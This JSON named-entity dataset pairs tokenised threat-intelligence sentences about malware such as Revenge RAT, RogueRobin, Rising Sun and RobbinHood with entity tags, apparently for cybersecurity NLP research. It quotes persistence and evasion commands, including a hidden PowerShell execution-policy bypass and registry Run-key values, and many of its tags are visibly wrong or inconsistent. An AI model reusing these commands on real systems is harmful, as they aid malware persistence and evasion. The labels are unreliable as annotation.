"tokens": [ - "Remsec", - "can", - "ping", - "or", - "traceroute", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "schedules", - "the", - "execution", - "one", - "of", - "its", - "modules", - "by", - "creating", - "a", - "new", - "scheduler", - "task." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "dump", - "the", - "SAM", - "database." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "has", - "a", - "plugin", - "detect", - "security", - "products", - "via", - "active", - "drivers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "the", - "OS", - "version", - "information,", - "computer", - "name,", - "processor", - "architecture,", - "machine", - "role,", - "and", - "OS", - "edition." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "information", - "about", - "network", - "configuration,", - "including", - "the", - "routing", - "table,", - "ARP", - "cache,", - "and", - "DNS", - "cache." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "a", - "list", - "of", - "active", - "connections", - "and", - "open", - "ports." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "information", - "about", - "the", - "current", - "user." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "using", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Responder", - "is", - "used", - "to", - "poison", - "name", - "services", - "to", - "gather", - "hashes", - "and", - "credentials", - "from", - "systems", - "within", - "a", - "local", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Responder", - "captures", - "hashes", - "and", - "credentials", - "that", - "are", - "sent", - "to", - "the", - "system", - "after", - "the", - "name", - "services", - "have", - "been", - "poisoned." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "a", - "plugin", - "for", - "microphone", - "interception." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "used", - "blogpost.com", - "as", - "its", - "primary", - "command", - "and", - "control", - "server", - "during", - "a", - "campaign." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "uses", - "the", - "Forfiles", - "utility", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "a", - "plugin", - "for", - "keylogging." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "uses", - "mshta.exe", - "to", - "run", - "malicious", - "scripts", - "on", - "the", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "a", - "plugin", - "for", - "credential", - "harvesting." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "uses", - "the", - "PowerShell", - "command", - "<code>Reflection.Assembly</code>", - "to", - "load", - "itself", - "into", - "memory", - "to", - "aid", - "in", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "a", - "plugin", - "to", - "perform", - "RDP", - "access." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "schedules", - "tasks", - "to", - "run", - "malicious", - "scripts", - "at", - "different", - "intervals." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "a", - "plugin", - "for", - "screen", - "capture." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "uses", - "Base64", - "to", - "encode", - "information", - "sent", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "collects", - "the", - "CPU", - "information,", - "OS", - "information,", - "and", - "system", - "language." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "collects", - "the", - "IP", - "address", - "and", - "MAC", - "address", - "from", - "the", - "system." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "gathers", - "the", - "username", - "from", - "the", - "system." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "has", - "the", - "ability", - "to", - "access", - "the", - "webcam." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "and", - "run", - "scripts", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Revenge", - "RAT", - "creates", - "a", - "Registry", - "key", - "at", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon\\Shell</code>", - "to", - "survive", - "a", - "system", - "reboot." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "added", - "four", - "additional", - "bytes", - "of", - "data", - "upon", - "launching,", - "then", - "saved", - "the", - "changed", - "version", - "as", - "<code>C:\\ProgramData\\Initech\\Initech.exe</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "encrypted", - "strings", - "with", - "a", - "single", - "byte", - "XOR", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "been", - "executed", - "from", - "malicious", - "Excel", - "or", - "Word", - "documents", - "containing", - "macros." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "created", - "a", - "new", - "registry", - "entry", - "at", - "<code>HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics</code>", - "with", - "a", - "value", - "of", - "<code>C:\\ProgramData\\Initech\\Initech.exe", - "/run</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "been", - "distributed", - "in", - "e-mails", - "with", - "malicious", - "Excel", - "or", - "Word", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "encrypted", - "command", - "and", - "control", - "(C2)", - "communications", - "with", - "a", - "stream", - "cipher." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "the", - "ability", - "to", - "identify", - "the", - "Windows", - "version", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "the", - "ability", - "to", - "identify", - "the", - "IP", - "address", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rifdoor", - "has", - "the", - "ability", - "to", - "identify", - "the", - "username", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "archive", - "data", - "using", - "RC4", - "encryption", - "and", - "Base64", - "encoding", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "variants", - "can", - "use", - "SSL", - "for", - "encrypting", - "C2", - "communications." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "has", - "collected", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "has", - "decrypted", - "itself", - "using", - "a", - "single-byte", - "XOR", - "scheme.", - "Additionally,", - "Rising", - "Sun", - "can", - "decrypt", - "its", - "configuration", - "data", - "at", - "runtime." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Configuration", - "data", - "used", - "by", - "Rising", - "Sun", - "has", - "been", - "encrypted", - "using", - "an", - "RC4", - "stream", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "send", - "data", - "gathered", - "from", - "the", - "infected", - "machine", - "via", - "HTTP", - "POST", - "request", - "to", - "the", - "C2." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "delete", - "files", - "and", - "artifacts", - "it", - "creates." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "enumerate", - "information", - "about", - "files", - "from", - "the", - "infected", - "system,", - "including", - "file", - "size,", - "attributes,", - "creation", - "time,", - "last", - "access", - "time,", - "and", - "write", - "time.", - "Rising", - "Sun", - "can", - "enumerate", - "the", - "compilation", - "timestamp", - "of", - "Windows", - "executable", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "modify", - "file", - "attributes", - "to", - "hide", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "clear", - "a", - "memory", - "blog", - "in", - "the", - "process", - "by", - "overwriting", - "it", - "with", - "junk", - "bytes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "test", - "a", - "connection", - "to", - "a", - "specified", - "network", - "IP", - "address", - "over", - "a", - "specified", - "port", - "number." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "used", - "dynamic", - "API", - "resolutions", - "to", - "various", - "Windows", - "APIs", - "by", - "leveraging", - "`LoadLibrary()`", - "and", - "`GetProcAddress()`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "enumerate", - "all", - "running", - "processes", - "and", - "process", - "information", - "on", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "has", - "identified", - "the", - "OS", - "product", - "name", - "from", - "a", - "compromised", - "host", - "by", - "searching", - "the", - "registry", - "for", - "`SOFTWARE\\MICROSOFT\\Windows", - "NT\\", - "CurrentVersion", - "|", - "ProductName`." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "detect", - "the", - "computer", - "name,", - "operating", - "system,", - "and", - "drive", - "information,", - "including", - "drive", - "type,", - "total", - "number", - "of", - "bytes", - "on", - "disk,", - "total", - "number", - "of", - "free", - "bytes", - "on", - "disk,", - "and", - "name", - "of", - "a", - "specified", - "volume." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "detect", - "network", - "adapter", - "and", - "IP", - "address", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "can", - "detect", - "the", - "username", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rising", - "Sun", - "has", - "executed", - "commands", - "using", - "`cmd.exe", - "/c", - "“<command>", - ">", - "<%temp%>\\AM<random>.", - "tmp”", - "2>&1`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "will", - "search", - "for", - "an", - "RSA", - "encryption", - "key", - "and", - "then", - "perform", - "its", - "encryption", - "process", - "on", - "the", - "system", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "will", - "search", - "for", - "Windows", - "services", - "that", - "are", - "associated", - "with", - "antivirus", - "software", - "on", - "the", - "system", - "and", - "kill", - "the", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "deletes", - "shadow", - "copies", - "to", - "ensure", - "that", - "all", - "the", - "data", - "cannot", - "be", - "restored", - "easily." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "disconnects", - "all", - "network", - "shares", - "from", - "the", - "computer", - "with", - "the", - "command", - "<code>net", - "use", - "*", - "/DELETE", - "/Y</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "stops", - "181", - "Windows", - "services", - "on", - "the", - "system", - "before", - "beginning", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RobbinHood", - "uses", - "cmd.exe", - "on", - "the", - "victim's", - "computer." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "has", - "used", - "Google", - "Drive", - "as", - "a", - "Command", - "and", - "Control", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PowerShell", - "script", - "with", - "the", - "RogueRobin", - "payload", - "was", - "obfuscated", - "using", - "the", - "COMPRESS", - "technique", - "in", - "`Invoke-Obfuscation`." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RogueRobin", - "decodes", - "an", - "embedded", - "executable", - "using", - "base64", - "and", - "decompresses", - "it." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "can", - "save", - "a", - "new", - "file", - "to", - "the", - "system", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "uses", - "a", - "command", - "prompt", - "to", - "run", - "a", - "PowerShell", - "script", - "from", - "Excel.", - "To", - "assist", - "in", - "establishing", - "persistence,", - "RogueRobin", - "creates", - "<code>%APPDATA%\\OneDrive.bat</code>", - "and", - "saves", - "the", - "following", - "string", - "to", - "it:<code>powershell.exe", - "-WindowStyle", - "Hidden", - "-exec", - "bypass", - "-File", - "“%APPDATA%\\OneDrive.ps1”</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "checks", - "the", - "running", - "processes", - "for", - "evidence", - "it", - "may", - "be", - "running", - "in", - "a", - "sandbox", - "environment.", - "It", - "specifically", - "enumerates", - "processes", - "for", - "Wireshark", - "and", - "Sysinternals." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "created", - "a", - "shortcut", - "in", - "the", - "Windows", - "startup", - "folder", - "to", - "launch", - "a", - "PowerShell", - "script", - "each", - "time", - "the", - "user", - "logs", - "in", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "uses", - "regsvr32.exe", - "to", - "run", - "a", - ".sct", - "file", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "has", - "a", - "command", - "named", - "<code>$screenshot</code>", - "that", - "may", - "be", - "responsible", - "for", - "taking", - "screenshots", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "enumerates", - "running", - "processes", - "to", - "search", - "for", - "Wireshark", - "and", - "Windows", - "Sysinternals", - "suite." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "establishes", - "persistence", - "by", - "creating", - "a", - "shortcut", - "(.LNK", - "file)", - "in", - "the", - "Windows", - "startup", - "folder", - "to", - "run", - "a", - "script", - "each", - "time", - "the", - "user", - "logs", - "in." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "base64", - "encodes", - "strings", - "that", - "are", - "sent", - "to", - "the", - "C2", - "over", - "its", - "DNS", - "tunnel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "uses", - "WMI", - "to", - "check", - "BIOS", - "version", - "for", - "VBOX,", - "bochs,", - "qemu,", - "virtualbox,", - "and", - "vm", - "to", - "check", - "for", - "evidence", - "that", - "the", - "script", - "might", - "be", - "executing", - "within", - "an", - "analysis", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "gathers", - "BIOS", - "versions", - "and", - "manufacturers,", - "the", - "number", - "of", - "CPU", - "cores,", - "the", - "total", - "physical", - "memory,", - "and", - "the", - "computer", - "name." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "gathers", - "the", - "IP", - "address", - "and", - "domain", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "collects", - "the", - "victim’s", - "username", - "and", - "whether", - "that", - "user", - "is", - "an", - "admin." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "uses", - "Windows", - "Script", - "Components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RogueRobin", - "uses", - "various", - "WMI", - "queries", - "to", - "check", - "if", - "the", - "sample", - "is", - "running", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Depending", - "on", - "the", - "Linux", - "distribution,", - "RotaJakiro", - "executes", - "a", - "set", - "of", - "commands", - "to", - "collect", - "device", - "information", - "and", - "sends", - "the", - "collected", - "information", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Depending", - "on", - "the", - "Linux", - "distribution", - "and", - "when", - "executing", - "with", - "root", - "permissions,", - "RotaJakiro", - "may", - "install", - "persistence", - "using", - "a", - "`.conf`", - "file", - "in", - "the", - "`/etc/init/`", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "uses", - "the", - "AES", - "algorithm,", - "bit", - "shifts", - "in", - "a", - "function", - "called", - "`rotate`,", - "and", - "an", - "XOR", - "cipher", - "to", - "decrypt", - "resources", - "required", - "for", - "persistence,", - "process", - "guarding,", - "and", - "file", - "locking.", - "It", - "also", - "performs", - "this", - "same", - "function", - "on", - "encrypted", - "stack", - "strings", - "and", - "the", - "`head`", - "and", - "`key`", - "sections", - "in", - "the", - "network", - "packet", - "structure", - "used", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "sends", - "device", - "and", - "other", - "collected", - "data", - "back", - "to", - "the", - "C2", - "using", - "the", - "established", - "C2", - "channels", - "over", - "TCP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - 